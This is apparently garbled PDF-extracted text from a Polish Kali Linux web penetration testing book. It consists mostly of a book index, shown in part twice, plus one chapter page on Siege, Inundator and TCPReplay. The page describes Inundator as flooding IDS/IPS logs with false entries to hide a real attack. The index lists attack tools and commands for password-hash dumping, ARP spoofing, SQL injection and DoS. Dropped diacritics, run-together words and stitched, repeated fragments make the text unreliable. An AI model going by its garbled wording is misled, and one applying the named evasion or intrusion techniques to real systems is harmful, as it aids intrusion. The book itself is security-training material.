174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 46: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

